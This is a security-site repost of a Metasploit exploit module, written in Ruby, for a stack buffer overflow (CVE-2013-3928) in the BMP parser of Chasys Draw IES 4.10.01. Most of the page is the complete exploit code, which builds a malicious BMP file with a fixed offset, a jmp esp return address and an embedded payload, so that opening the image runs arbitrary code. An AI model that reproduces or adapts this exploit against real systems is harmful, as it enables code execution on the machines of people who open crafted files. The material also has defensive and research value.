Chasys Draw IES Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Chasys Draw IES Buffer Overflow

来源：metasploit.com 作者：Gabriel 发布时间：2013-08-15

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Chasys Draw IES Buffer Overflow",
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability found in Chasys Draw IES
				(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
				parsing BMP files, where the ReadFile function is used to store user provided data
				on the  stack in a insecure way. It results in arbitrary code execution under the
				context of the user viewing a specially crafted BMP file. This module has been
				tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
				SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Christopher Gabriel',     # Vulnerability Discovery
					'Longinos Recuero Bustos', # PoC
					'Javier \'soez\'',         # PoC
					'juan vazquez'             # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2013-3928' ],
					[ 'BID', '61463' ],
					[ 'URL', 'http://secunia.com/advisories/53773/' ],
					[ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ]
				],
			'Payload'        =>
				{
					'Space'       => 21112, # Indeed there is more space available on the stack, just limited by the trigger
					'DisableNops' => true
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
						{
							'Offset' => 65536,
							'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jul 26 2013",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.bmp']),
			], self.class)

	end

	def exploit

		bof = rand_text(target['Offset'])
		bof << [target.ret].pack("V")
		bof << payload.encoded

		bitmap_header = ""
		bitmap_header << [0x28].pack("V")       # HeaderSize
		bitmap_header << [0x4a3].pack("V")      # Width    # Used to trigger the overflow
		bitmap_header << [0x1].pack("V")        # Height
		bitmap_header << [0x9].pack("v")        # Planes   # Used to trigger the overflow
		bitmap_header << [0x41].pack("v")       # BitCount # Used to trigger the overflow
		bitmap_header << [0x0].pack("V")        # Compression
		bitmap_header << [bof.length].pack("V") # SizeImage
		bitmap_header << [0x0].pack("V")        # PelsPerMeterX
		bitmap_header << [0x0].pack("V")        # PelsPerMeterY
		bitmap_header << [0x0].pack("V")        # ClrUse
		bitmap_header << [0x0].pack("V")        # ClrImportant

		total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

		file_header = ""
		file_header << "BM"                     # Signature
		file_header << [total_size].pack("V")   # Size
		file_header << [0].pack("V")            # Reserved
		file_header << [0x36].pack("V")         # BitsOffsets

		bmp = file_header + bitmap_header + bof
		file_create(bmp)
	end
end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告